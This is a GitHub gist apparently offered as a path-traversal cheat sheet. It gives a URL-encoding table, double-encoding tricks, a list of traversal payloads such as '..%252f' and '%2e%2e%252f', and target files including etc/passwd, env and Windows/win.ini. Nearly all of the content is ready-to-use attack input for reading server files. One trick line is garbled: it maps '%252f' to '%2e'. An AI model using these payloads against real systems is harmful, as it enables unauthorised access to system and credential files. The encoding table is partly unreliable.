Skip to content

Instantly share code, notes, and snippets.

@felipecaon
Last active October 11, 2022 01:08
Show Gist options
  • Save felipecaon/c092959d381dd5b61d91bae182bdacdc to your computer and use it in GitHub Desktop.
Save felipecaon/c092959d381dd5b61d91bae182bdacdc to your computer and use it in GitHub Desktop.
| Char | Encoded |
| --- | --- |
| space | %20 |
| / | %2f |
| \ | %5c |
| % | %25 |
| . | %2e |
| f | %66 |
| e | %65 |
## Tricks
%252%66 -> %2f -> /
%252%65 -> %2e -> .
%252f -> %2f -> /
%252f -> %2e -> .
## Payloads
..;/
..%5c
..%2f
../
..\
..%252f
%2e%2e%252f
/
//
///
////
/////
//////
///////
////////
/////////
//////////
## Files
env
etc/passwd
Windows/win.ini
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment